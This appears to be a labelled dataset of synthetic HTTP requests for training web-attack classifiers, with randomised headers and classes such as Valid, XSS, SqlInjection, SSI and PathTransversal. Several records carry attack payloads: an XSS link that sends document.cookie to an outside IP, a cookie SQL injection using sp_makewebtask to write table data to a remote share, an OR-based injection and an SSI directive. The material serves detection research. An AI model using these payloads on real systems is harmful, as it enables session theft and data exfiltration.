Cookie: hptS3hHrao=hlthaccess_logEulandm;dlaneritanped=3068105;ahntl=4I4DVC;p9l4hAv=165;PacI=1970
Cookie2: $Version="5"
Date: Sun, 07 Mar 04 12:30:54 UTC
ETag: W/"pBTFR7SLhVLXj.XI"
Expect: tdqm
From: uAaSoTat@85nr5ec.org
If-Modified-Since: Tue, 06 Nov 07 24:16:27 CET
If-Unmodified-Since: Mon, 23 Nov 09 09:06:15 GMT
If-Match: "GM1ZN0-VEzVX0@O7hz"
If-None-Match: *
If-Range: "_GAzh@j7to8Lv3f9"
Max-Forwards: 768
MIME-Version: 9.5
Pragma: rlitR9S=noasnay
Proxy-Authorization: daahrP decdjt5=wri6iree
Authorization: Digest username="tiwoSh"
Range: -91,787-299778
Referer: /3CQ1si/h6x8eri/Teerlsqq/dejfB.gz
TE: trailers
Trailer: Host
User-Agent: 15mrne
UA-CPU: MIPS
UA-Disp: 2834,2406,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 232x3893
Via: 6.1 www.iedatda.js, 8.2 www.eioe.gif, FTP/0.1 227.63.33.150
Transfer-Encoding: compress
Upgrade: i2e/5.2, E6w/3.7, mge/6.8
Warning: 530 32.109.118.103 "hOGeuun3sa018i" 
X-Forwarded-For: 236.249.18.77
X-Serial-Number: 611965021882313
----: ------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 41667
Start - Id: 39296
class: SSI
GET /27bumxkaen1x5Ttxe/iZlF8ksH/i3Wn9/olon3dha5nvanh1er/1h1DaaeAIF.nd.js?rv2egWaio=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&nbaa9frA7oaqtwa=cWicvX HTTP/1.1
Host: www.ta3ze.fr:80
Connection: keep-alive
Accept: video/*
Accept-Charset: *;q=0.0
Accept-Encoding: identity;q=0.0, gzip, compress, gzip, compress
Accept-Language: hob-nriNnfd;q=0.5
Cache-Control: min-fresh=559
Client-ip: 178.60.27.113
Cookie: tm=e4eim
Cookie2: $Version="390"
Date: Tue, 23 Jan 07 01:52:02 UTC
ETag: W/"jsr.W0L@rVg50t8d"
Expect: 100-continue
From: unmiie@Hyivtsn.com
If-Modified-Since: Thu, 31 Jan 08 11:47:45 GMT
If-Unmodified-Since: Sun, 29 Mar 09 17:57:44 GMT
If-Match: *
If-None-Match: "Ohb_@MSYNk.0vicdi"
If-Range: Thu, 16 Dec 04 20:00:28 CET
Max-Forwards: 6
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Basic N3NzZ21vbG86bnUzaQ==
Authorization: Basic Z3NyZWE6dHRiQWFu
Range: 7-228,-05193
Referer: http://www.ijkn.ch/moL1s/3iottnxM/wtlD/ra2o4r.dll
TE: trailers,deflate;q=0.6
Trailer: Expect
User-Agent: Mozilla/8.4 (Machintosh; U; PPC 5.0; nm-i9; rv:7.4.3) Gecko/67783283
UA-CPU: Sparc
UA-Disp: 646,7509,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 573x190
Via: 5e9yr/3.9 www.ihigc.css, HTTP/7.9 www.5qRdgsre.html
Transfer-Encoding: ks2h1; sdgoons=srt4ty
Upgrade: m0oet/4.8
Warning: 220 149.222.61.240 "icibtopbtoQts" "Tue, 05 Apr 05 10:07:37 UTC"
X-Forwarded-For: 229.251.127.187
X-Serial-Number: 80952053828136219
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39296
Start - Id: 32303
class: Valid
GET /noxG/seeeirstir4bd/ouamV12mS3x4.mdb?eesotonwTwtc5=04744614&nn8t1dhuedInmih=eeitTfiTaohFm3&nt=744&Uetlaaen1al=203002 HTTP/1.1
Host: 94.63.172.172:80
Connection: hrln38
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.5, gzip;q=0.6, compress;q=0.1, gzip, identity;q=0.3
Accept-Language: *
Cache-Control: no-store
Client-ip: 79.52.118.230
Cookie: dDotrxetedosE=363201375;izoh=28043;xQmochabD9PPQMH=63;aTIrnHinCoh=th;8execQm= nnrhMoHy
Cookie2: $Version="501"
Date: Thu, 15 Nov 07 09:38:26 CET
ETag: W/"PwGVrzKVjv.b6qx3Q"
Expect: 100-continue
From: dyhd@dppe.gov
If-Modified-Since: Sun, 11 Nov 07 14:06:36 CET
If-Unmodified-Since: Sat, 27 Sep 08 24:54:51 CET
If-Match: *
If-None-Match: "8_I@b6dGTgspbFo2re5"
If-Range: Wed, 23 Mar 05 05:26:31 UTC
Max-Forwards: 7
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: eqcroe eh0ts=bnu9dnt
Authorization: Basic b3BteWl5OmF0RTF0ZmV6
Range: 03424-,9-
Referer: http://e4ZChaoo.net/nnhShy/8ilsa/abeehEvc/ytlteo.asp
TE: chunked,gzip,trailers
Trailer: Max-Forwards
User-Agent: qi1Fm/1.9.0
UA-CPU: PowerPC
UA-Disp: 096,809,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 8587x607
Via: qit/1.4 4.110.45.78
Transfer-Encoding: deflate
Upgrade: isLo/1.1, ii6oo9/3.4, yei/5.6
Warning: 144 36.5.81.66 "nisieeaPsv62Lonttai" 
X-Forwarded-For: 132.144.23.218
X-Serial-Number: 298337
----: ------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 32303
Start - Id: 23579
class: Valid
GET /gfom2ecjuoatrieeetn/eDb5/b5r2etnSt5/tvvwo/iatrgvgU/5hNaalgtaa.sh?ohOirdioeci4=32909&iifeos=rinnG.8ywC&nwet5raseLly=ikfRt&eraohit7d=vbscript8oepe HTTP/1.0
Host: www.sus9Mihpua.cz:85958
Connection: 854h
Accept: video/mpeg, video/quicktime;q=0.8, text/*;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: compress, deflate;q=0.0, identity, deflate, identity
Accept-Language: syle-t0tstu;q=0.6, daH-wOe;q=0.6
Cache-Control: no-cache
Client-ip: 214.95.37.188
Cookie: lYrhpDNxnaatra=et 
Cookie2: $Version="95"
Date: Sat, 15 Oct 05 21:25:41 UTC
ETag: "WlphIMoksGEL5gbZ"
Expect: s9ns8l=nsTeNoH;eoddienm=1dshxerB
From: Aial5osa@Mysrie.uk
If-Modified-Since: Sun, 16 Aug 09 17:08:24 GMT
If-Unmodified-Since: Sat, 11 Aug 07 20:46:47 UTC
If-Match: "ddsfc9P2aKpMoOa9"
If-None-Match: "blvlyfEDgok231Efm2v"
If-Range: "X6j9Tq53by2BN7zz"
Max-Forwards: 972
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Basic ZTNpdHNFbnM6UmhobGNQMA==
Authorization: Basic eWk4MGNlOnRnb3c=
Range: 62145-4,-94,41-
Referer: http://rrtM.de/lrrNbNar/i5neb.nsf
TE: gzip;q=0.4,chunked;q=0.5
Trailer: If-Unmodified-Since
User-Agent: iTwyI93O http://www.ru0teeet.be
UA-CPU: StrongARM
UA-Disp: 990,4504,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 4426x0282
Via: FTP/2.0 www.st9A.html, 8.5 248.245.94.238, 6.7 www.ele6loie.shtml
Transfer-Encoding: compress
Upgrade: rtK/6.9
Warning: 651 144.9.93.192:287 "xetiPfossquidaftieM" "Sat, 09 Aug 08 08:49:36 CET"
X-Forwarded-For: 114.129.219.250
X-Serial-Number: 1009110184973666911
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23579
Start - Id: 45230
class: PathTransversal
GET /./? HTTP/1.1
Host: 113.212.80.67
Connection: close
Accept: image/png, video/quicktime, application/zip
Accept-Charset: x-mac-japanese, x-mac-ce, utf-8;q=0.0, windows-1252;q=0.4
Accept-Encoding: compress
Accept-Language: ec-ueled, noeeee-mgernag, dsc-hoefE, aeuabs-qtacE;q=0.1
Cache-Control: no-store
Client-ip: 91.52.105.115
Cookie: glinuata=tje_8U6i;ra6hcfvDvitr=250;hew6cy2=aaxert6;trfln=2435663;bh0ke2sek=88536033
Cookie2: $Version="1"
Date: Fri, 18 Dec 09 21:21:35 CET
ETag: W/"HAjYQ@UH.6s769k_XZxi"
Expect: hslN
From: nr1cs36r@ar1hsxlt.org
If-Modified-Since: Tue, 15 Jun 04 16:34:08 CET
If-Unmodified-Since: Mon, 10 Apr 06 05:19:14 CET
If-Match: *
If-None-Match: "C.H7XAnMwTF16WeK"
If-Range: "Y-OlY2tjtiH81a87aA"
Max-Forwards: 128
MIME-Version: 3.6
Pragma: yeaett=Nliowgxn
Proxy-Authorization: Digest qop=evai40
Authorization: NTLM eUlsY0V0aHdZbndYRXVuVGc0c3RwODZub29TNE5uZW5ubnR0c3NjYWZjcnJ1TWQ=
Range: 220-5761,42620-
Referer: /bwfxj/szosTted/Dmt7rd/ytaokrbd/enszReb.mpg
TE: trailers,chunked;q=0.2,trailers
Trailer: Expect
User-Agent: Mozilla/3.4 (X11; U; Open BSD i386 7.0; rn-ed; rv:5.9.4) Gecko/29857472
UA-CPU: x86
UA-Disp: 675,5988,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2272x045
Via: 6.7 48.24.80.24, FTP/9.4 www.SjTrr.jpeg:7194, FTP/1.4 www.e3veus0t.gif:85
Transfer-Encoding: lsp9l
Upgrade: ttt5/9.0, laolhr/8.9, geei2/4.3
Warning: 831 www.rueghla.htm "ecA7eejeodtti" 
X-Forwarded-For: 42.110.150.96
X-Serial-Number: 706890452941318
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45230
Start - Id: 47949
class: XSS
GET /dm_8.fmEkgmCJ1I/pCLPj0SR5/xecateor/nc_0BZdYpU/lmetE/Awml/execQYg.1jUn/dYtggcOJ4/0aXtwhere/aoenhaT.htm?anshn2t=%3Clink+rel++++%3D+++%22+stylesheet+++++++%22+href+%3D++++%22+++javascript%3A%5Bwindow.open%28%27http%3A%2F%2F84.82.75.252%2Fin.asmx%27%2Bdocument.cookie%29%3B%5D+++++++%22++++%3E&5eWlocationMj8bbXF=hutAg&YPLuniontvMy=0757259&y3ob=43258665&iilbpoe61e6doa=opateuki&Tet6=%24&t7Uternede3u3wn=httpa%40&o9etirrps2nUdag=mnn0tnxml HTTP/1.1
Host: www.yztu2etI.net
Connection: keep-alive
Accept: text/plain
Accept-Charset: euc-cn, iso-8859-6;q=0.8, ks_c_5601-1987;q=0.7
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: max-stale=63
Client-ip: 55.58.52.249
Cookie: ln=ent;en=a dNaaihuybfD;1scriptQjC8eB=:b
Cookie2: $Version="771"
Date: Sat, 23 Jun 07 21:11:05 CET
ETag: "lT7Ksneo3lP4TiG"
Expect: 6eyHrt=uh5Fndw;srtt=eyNndbn
From: Eawmtren@tifsCoeGen.net
If-Modified-Since: Fri, 13 Aug 04 17:24:36 CET
If-Unmodified-Since: Fri, 20 Feb 09 06:47:35 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 24 Jan 04 15:20:52 UTC
Max-Forwards: 47
MIME-Version: 2.0
Pragma: Rors=adntg
Proxy-Authorization: mbntn edar=HBooepu
Authorization: Digest nc=D3344DE4
Range: -162,92-
Referer: http://1etr.ch/RmguGav/MvtlwlUE/fsialH.cfm
TE: deflate,trailers
Trailer: Date
User-Agent: GtZoS (ir1mTaf; p8phpJEe; naB0DGpL0; m04PZALK@h; amkAvys)
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5386x6954
Via: 2.6 10.119.82.173
Transfer-Encoding: deflate
Upgrade: cho/4.7, fss/8.0, m4ety/0.5, r4gd/1.6
Warning: 644 www.h7jist.js:4 "esfqduza4efrwceom" 
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 91293701405226650926
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47949
Start - Id: 41172
class: SqlInjection
POST /sxyhien/sDess/ngxco9e8mb82XP/Ggz8IEYAyEwrCd/eg-K6fx6JhabQFtql/n9RB1IQH6g-wm0/h7t6iOnjdk3inngiiuIi.css? HTTP/1.0
Content-Length: 181
Content-Language: e5i,s
Content-Encoding: deflate
Content-Location: http://nouE3oi.ch/betg.wmn
Content-MD5: emV0ZUt5ZHNvaUluZWVxWQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 10 Jun 04 22:15:56 GMT
Last-Modified: Fri, 22 Jun 07 21:11:33 GMT
Host: 115.146.50.23:80
Connection: keep-alive
Accept: audio/*, image/png, video/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 63.133.125.251
Cookie: ka9owtpdctee=ollink;adave=';  EXEC     master..sp_makewebtask    "\\222.7.162.68\liaeTi\sze.tiff",  "SELECT    *  FROM INFORMATION_SCHEMA.TABLES";Efouaitieos=rSB67
Cookie2: $Version="399"
Date: Fri, 13 Mar 09 14:50:32 UTC
ETag: "nBG3oMnWHY@wDjlOn"
Expect: 100-continue
If-Modified-Since: Thu, 31 Aug 06 16:20:53 UTC
If-Unmodified-Since: Mon, 09 Feb 09 06:32:53 GMT
If-Match: *
If-Range: Sat, 02 Apr 05 08:13:37 GMT
Max-Forwards: 7
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: nhtos lpYb=io9One
Referer: http://www.fr4o.fr/daa4setk/idutoeeQ.pdf
TE: deflate;q=0.3,trailers
User-Agent: rmte7/5.9.2.6
Via: 3.9 www.senni3h.css, osw3/0.3 149.197.74.202:77
----: -------------------------
~~~~~: ~~~~~~~~~~~~

o4c=rV2s&BXolQV.PRN4-=eo+x-6r1+perlElinkbseval%27+qe&Bincludez8=a2.p&mA=rIst8emechoy0of%28ea&epe475snrot=NAlweb4pbN&yWuSrW%uFWJnetcatl=7uaTxy%28am&be5oib3t=oX%2Bd&R@rVyRbRa=jARZVBsJ

End - Id: 41172
Start - Id: 7334
class: Valid
POST /8KCQx/ptcg9QFtd/E1nnt/dbLT3ZBIXCP-wwC/rtutfaxolosrs6/rithorl/jYFvDW7a_AOUItzJ/Tfstt/Hufdsdrht4ewj6Thueto/knEs9ctriciao1uNsao/Eneu7dradrrhdiitu.css? HTTP/1.0
Content-Length: 212
Content-Language: HRlqcen,saryssv,30e
Content-Encoding: gzip
Content-Location: /1nhqsHtn/efed/hgloei/bo9s/wilaueae.rar
Content-MD5: aXphamRzc0Vvbzdzb29ldA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 19 Jun 07 02:58:23 GMT
Last-Modified: Thu, 10 Jan 08 17:31:25 CET
Host: 94.28.112.248
Connection: close
Accept: image/*
Accept-Charset: iso-8859-1
Accept-Encoding: deflate, deflate;q=0.0
Accept-Language: ten-gWRnHt, tefsknhW-Amse6Sr, Oapt-feInisog, ewtn-ae;q=0.2, xN4VnAda-hscywii;q=0.4
Cache-Control: no-store
Client-ip: 18.53.58.226
Cookie: 8aairi=dbwx3w4;THS@wGRUX=13;lkmpna8la5ee9an=5048;ei3=Muon elogerm;ngqereetaoitxhs=x7sipassthruD=8m1sxterm1Usts
Cookie2: $Version="02"
Date: Tue, 11 Dec 07 15:17:47 UTC
ETag: W/"x.1@yW8wIjiCNMwf"
Expect: 100-continue
From: mHrrayts@zrc6snifaP.ch
If-Modified-Since: Tue, 03 Jan 06 19:13:42 UTC
If-Unmodified-Since: Tue, 28 Apr 09 22:31:49 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 04 Jul 07 11:42:42 CET
Max-Forwards: 2
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: NTLM Njllcmh0bmxBbnF0T2RhZWh3anVydGRzM25lZG9zZzZ1U3R0UGVqTm8=
Authorization: NTLM bnQ0T25hbm9naGVjdFRpc2JhZGRqb1l5c3JpaHIyYWVhdA==
Range: 8-57,12-302,31375-71
Referer: /yexP5nps/1Nmmlee/iNitel3b/itlrannr/iLoq.sh
TE: trailers,trailers,chunked
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.6 (X11; U; Unix 3.9; tN-ni; rv:8.0.7) Gecko/05361155
UA-CPU: 68000
UA-Disp: 688,983,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 1302x7380
Via: FTP/9.1 234.146.152.32, FTP/9.5 www.xtgAib.htm
Transfer-Encoding: compress
Upgrade: 5a1o/5.9, umu/3.5
Warning: 203 227.12.172.4 "glfymariontdS0eiet" "Sat, 14 May 05 05:37:02 GMT"
X-Forwarded-For: 109.33.9.119
X-Serial-Number: 0347000130099147
----: ------------------
~~~~~: ~~~~~~~~~~~~

rfrun=ePf2&l3leeEoHNcecI1m=sLk&5v@J05=lnf8aooww4vars &ntw1tpnu=dru4 u7oIt1&telnetG-3=d7(w2&ssr3po8rdsa7lny=sJ@ke6&yhunmJpt8e3=wkzKZxry&ne=883&oNet1khce8ln7te=462668&SdOtCwp=position-SynwgetEaduW&rxrntoza=tcco

End - Id: 7334
Start - Id: 1569
class: Valid
GET /nGsqmyL/tyD_Zc8h6vEiq8OVGrI/Nfzr8/danBw9fNVgW_QD2pQgo/8n8aa41sctoeeg1t/j26/paaadTotles/eU0MEoCSBepfr/qataet/aSW.y@RRM.DL7R6eh9j.png?tnlne=yehlap&Nrefhfzo=fOPVmgE&al1unbdauinsm=90191&prnh=85296458&homeqFy7Sreplace=0&wctoessye=ernra%7C HTTP/1.1
Host: www.lnnlqrsmet.com
Connection: keep-alive
Accept: text/html;q=0.3, image/*
Accept-Charset: iso-8859-4, koi8, iso-8859-9;q=0.9
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.0
Cache-Control: max-stale
Client-ip: 229.141.60.162
Cookie: ci=MnIknaic;M2wnI=&Bsen7;annpnhye2n3=091;fluhn=2sOY_QpAL;oe=euiframeTqincludeanaareplace cCaccess_log;fntdoseothyeny=uee5s
Cookie2: $Version="8"
Date: Mon, 01 Feb 10 03:53:26 CET
ETag: W/"TcNTBE.hnvT-fkK"
Expect: uumaob=nye0d
From: tyoranj@tial.uk
If-Modified-Since: Fri, 04 Jan 08 03:55:00 CET
If-Unmodified-Since: Fri, 25 Jan 08 10:17:35 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 0.0
Pragma: sra8n=ae7h
Proxy-Authorization: Digest qop=auth-int
Authorization: ssdm olbrhazl=e7attr
Range: -7155,577-
Referer: http://www.3S3j6d.fr/ebdeetbn/S7se.gz
TE: deflate,deflate,deflate;q=0.2
Trailer: Authorization
User-Agent: Mozilla/0.3 (Windows; U; WinNT 3.3; s1-ao; rv:5.8.4) Gecko/02190869
UA-CPU: StrongARM
UA-Disp: 7507,6245,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7934x8697
Via: HTTP/0.7 www.iDetCatR.shtml:729, HTTP/5.7 23.168.141.133, 4.2 151.125.124.105:9210
Transfer-Encoding: identity
Upgrade: tbn/9.6, 9ao/1.1
Warning: 518 www.hers.gif "aamoe7haewyo" "Sun, 21 Dec 08 03:56:11 CET"
X-Forwarded-For: 36.197.187.144
X-Serial-Number: 4623775518466698
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1569
Start - Id: 42009
class: SqlInjection
GET /asnrdwrklgp3suel/taastntshhhea/WkinxQHvcOma8/5wtJMtjQS/paM@-i2Z9D-uY/yv8@UE_LKiACmavzzUA/hk9.xQrZuO.tiff?ei=9FTuTDYIW6&rFuS=eHE_.iWsvW_&VhMeBZseautoexecmeta=58&acrcheeiESty=1&MUI@4=kev0Nonm8t8dbeaeno&ahq8ayq4wee9u=spHvHA5X9F&XRdopenOselectj1Go=nv8yDedAkb&mHotit0ms=%27++OR++++%27iio%27++++%3C+++++%27X&mrhetW0cdy=a0- HTTP/1.0
Host: www.itie.it
Connection: toqIdTt
Accept: text/plain;q=0.7, video/quicktime;q=0.8, audio/*
Accept-Charset: x-mac-icelandic, x-mac-hebrew;q=0.1, euc-tw;q=0.9, windows-874
Accept-Encoding: *;q=0.3
Accept-Language: iiiae-O;q=0.3, o-nubllue, HpaOa-I;q=0.9, d-aytCaai, 1Mbh-o;q=0.2
Cache-Control: no-store
Client-ip: 11.178.28.161
Cookie: seogumOoc=Enenn;vo0@3F66SMF=55;6sfhii4ns4wns=wsroyiEhd;euoOoAa7heihs=) a read q/nc3c6&t
Cookie2: $Version="53"
Date: Wed, 03 Aug 05 22:31:26 UTC
ETag: "6Uyl2Y07moKN10dFmON"
Expect: 100-continue
From: etDdz@s1Ttlneied.ch
If-Modified-Since: Wed, 04 Oct 06 22:40:15 UTC
If-Unmodified-Since: Sat, 12 Aug 06 09:45:45 CET
If-Match: *
If-None-Match: "4jIoEHL7roMwB2w"
If-Range: Thu, 13 Aug 09 09:08:32 GMT
Max-Forwards: 0
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest uri=/oyooyi/aelsuo1/iteo/eu7usa/EDiri.cfm
Authorization: Digest opaque="4venij"
Range: -2,-9858,-988607
Referer: /IhIl02d/knEhO/52e3/gAds5j.msf
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/2.3 (Machintosh; U; PPC 9.2; oe-ii; rv:6.0.8) Gecko/70665283
UA-CPU: StrongARM
UA-Disp: 442,012,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0057x268
Via: HTTP/4.5 5.38.166.48
Transfer-Encoding: compress
Upgrade: efau/6.6
Warning: 117 www.dpoc.html "usfeuteterl01" 
X-Forwarded-For: 214.42.126.39
X-Serial-Number: 063116688396663
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 42009
Start - Id: 17024
class: Valid
GET /Lehoe/rlwfcidrb0ohqhe/nrsu/h2ao/ipEX5XBlBRXiGpDDIW.msf?A1IeNcbnph-L=4207447&m4ERQ=anasne7tnieiEeoets&anuheeew9hhe=etn%25%5Curc&nc=%28aSdivorewhc&dUpyt=A6ueNleiheR HTTP/1.0
Host: www.ta7Olarty.ch
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.1
Accept-Encoding: identity, deflate
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 28.189.114.107
Cookie: now82soehNot==2bvunrm7;ia=a=3rrp7b;ttirh=ta;gre6nG8ungZnTe=neseies
Cookie2: $Version="7"
Date: Sat, 15 Mar 08 08:16:31 GMT
ETag: "A.ZS.4O2iFEzeW3cA6L"
Expect: 100-continue
From: o6rtrd8@ttmr.cz
If-Modified-Since: Fri, 26 Feb 10 05:04:57 UTC
If-Unmodified-Since: Fri, 17 Apr 09 20:20:15 UTC
If-Match: "d_FfbvrMZHniE8t"
If-None-Match: "6Lyano@_Fbb4HLBFEiDK"
If-Range: Wed, 19 Nov 08 04:40:57 UTC
Max-Forwards: 6
MIME-Version: 3.6
Pragma: Sierp='rn'
Proxy-Authorization: NTLM YWpzemVvY2lob3NuaXNqRXJybHptQnJqdGhoZGR0UnN4ckU=
Authorization: re5jst cnItwr=TooOw2ai
Range: 9605-9
Referer: http://www.anov.uk/Xnie/ntimaI/nls9tha/celchrp.php4
TE: trailers,gzip;q=0.9,gzip
Trailer: Authorization
User-Agent: Mozilla/4.3 (compatible; syolewci0; Open BSD i586; oucKmozha; ndghtiefa; 9enjed)
UA-CPU: StrongARM
UA-Disp: 7236,439,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 486x328
Via: 8.6 192.8.242.189:62224
Transfer-Encoding: compress
Upgrade: odh5/2.1, xoa/9.0
Warning: 748 211.185.9.15 "1tesO3h" "Fri, 30 Nov 07 14:52:33 UTC"
X-Forwarded-For: 183.169.171.70
X-Serial-Number: 380344
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17024
Start - Id: 11152
class: Valid
GET /ustbvl/jgnDD7@9Oq4-kBsO@H/irw/eKn4yEpbNNW-rWa-xn4/auwxoScMqhT78/tswrj8e3lh2a6e6oyE/m0aLAJ/lim.css?npntAarktt6=ioy7it0reiiatUep&iwwuVsbImn6op9=%3Ee&1omdotrmtq=sV1rtentzjse&Ic.W=r%3Ceo&Atat=AesgcIjjhg&ustdin4-iframe3bink=ETsrelinkhnode7di&nNontrRgtT=eeetwnsw&ixeEansqi=01997&eediuT0Oge=%3Cpe+aeiwaoe7ow1&ed1pyloeayonw=o%28&3beutaaAn=12149&aeF7rojeie=l.UeiG0HAT5&gnIdtnDnaSula=esfst&Kxp_Z0ddocumentzUm=65134&qntogksdnas=3ad HTTP/1.1
Host: www.aCtj.net
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: 7bu='mdo'
Client-ip: 124.3.147.71
Cookie: egltje=tSmssp;4RTgElwfbPtmp=rltrrlyh8otk
Cookie2: $Version="58"
Date: Thu, 27 Jan 05 17:23:59 UTC
ETag: W/"pqa7.Eb.076tCbGL"
Expect: Eeinreoo=l3eey4u
From: daneee@lheneowi.org
If-Modified-Since: Thu, 17 Dec 09 10:40:42 GMT
If-Unmodified-Since: Tue, 18 Aug 09 08:11:36 UTC
If-Match: *
If-None-Match: "622Djpvxn6nnpbnYW"
If-Range: "j7OCNI6zPkSJbNVkZ"
Max-Forwards: 3
MIME-Version: 0.7
Pragma: sdNi2aw='1o0bwE6'
Proxy-Authorization: Digest response="FF6f55D1baDeb6c2C872bb57B9eB0aDd"
Authorization: NTLM RWlqblNSc25haGxxbmZ1aU5kZWE5dHRyeHNzeGVlbmt0cA==
Range: 5-671745,5852-9861
Referer: http://www.e6yiziqn.com/ouete/syl6r0/5hancEos/6evansdb/9l6et.bin
TE: trailers,gzip;q=0.1,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/8.2 (X11; U; SunOS sun4u 0.7; mo-b3; rv:8.1.2) Gecko/10183003
UA-CPU: 68000
UA-Disp: 8419,120,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 571x624
Via: 5.8 197.162.148.7, 1.0 21.38.131.37
Transfer-Encoding: gzip
Upgrade: hgrW/3.1
Warning: 319 57.235.65.0 "jRcg2cbta" "Thu, 02 Apr 09 11:25:24 GMT"
X-Forwarded-For: 207.202.183.212
X-Serial-Number: 98553683859236748
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 11152
Start - Id: 5624
class: Valid
PUT /xH34olnygt/-S6script1v-vUCA3/0s3ae/hgese1osiHesewsfrm/vfqde5ajeendTuh.nsf? HTTP/1.0
Content-Length: 104
Content-Language: nluhaat,Nonr,le
Content-Encoding: gzip
Content-Location: /neter/ntpetCse.zip
Content-MD5: UGd1dGZ0SW1vbHNsb2tpcg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 24 Sep 04 03:19:59 CET
Last-Modified: Wed, 10 Jan 07 18:33:36 GMT
Host: 6.170.119.141
Connection: close
Accept: application/*
Accept-Charset: iso-8859-8-i
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-cache
Client-ip: 236.196.163.25
Cookie: Ieegi=vo;potenjL1oeiit=538
Cookie2: $Version="2"
Date: Wed, 23 Dec 09 18:44:03 CET
ETag: W/"ciw4JlqQjA6fIxmD-"
Expect: idqica2
From: frbac@ngi0nanafk.biz
If-Modified-Since: Tue, 15 Jul 08 22:38:21 UTC
If-Unmodified-Since: Sat, 12 Jan 08 17:25:06 GMT
If-Match: "kneUhxXSPIbE5GHARDX9"
If-None-Match: *
If-Range: Fri, 23 Jan 04 19:08:12 UTC
Max-Forwards: 701
MIME-Version: 9.8
Pragma: Wr9pah='hms'
Proxy-Authorization: eoaot ubahyefg=7a5iI
Authorization: heTtsd f7ta=thINso
Range: 67795-,06619-,662301-47622
Referer: http://etjenyen.ch/hrwhneem/iwret0e1/dpe2.jsp
TE: gzip
Trailer: If-Modified-Since
User-Agent: wMiVC.7R http://www.0cq1.it
UA-CPU: x86
UA-Disp: 6817,0716,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 768x653
Via: cu7ae/6.2 www.e4l0.jpeg, FTP/7.8 202.231.227.2, HTTP/0.7 www.sced.gif
Transfer-Encoding: deflate
Upgrade: itsx/1.1, sjNs/5.5, rsIR/6.3, teTe/2.5
Warning: 865 www.holxn.css "aoehbntNeGcpervi4" 
X-Forwarded-For: 253.42.32.113
X-Serial-Number: 382947508350489867
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

ctl3epetethZanT=0javgrstoct&oodaTtN=613951&mailkoSaRSsF=o8exec&m8ThatRoibitB=2po<8it]t[reiank/Ad

End - Id: 5624
Start - Id: 19187
class: Valid
GET /lneornpyiv3heB/9tA.aspx?m7dncrle=10182660&ioguqy=lain7e&haes=trHth%3Dbahb&7egu=odua&ztu=aAI+alJv3l&ysRwinnt2-c=r6tatd0a+%7C&ooypNASt=327&etelv=86308&RGhavingvn8=0906797&qD34g7X2H8LK=78 HTTP/1.0
Host: www.neethmt.de
Connection: ewtA
Accept: application/*, application/rtf;q=0.6
Accept-Charset: x-mac-ce, iso-8859-9, x-mac-chinesesimp
Accept-Encoding: 
Accept-Language: f4nesdax-atoh, uv-au;q=0.7
Cache-Control: no-cache
Client-ip: 142.29.203.226
Cookie: naad6bh4gcassd=e5/~HcKih5oott ;heo=26321113;mcHA=twnavarUoe;an=sahGsw8]
Cookie2: $Version="54"
Date: Thu, 08 Mar 07 10:45:58 GMT
ETag: "3Ey3ISpAUMoXihA-_wV"
Expect: hrRir
From: ToNpsn@tvfalhel.biz
If-Modified-Since: Sat, 21 Jul 07 21:24:21 UTC
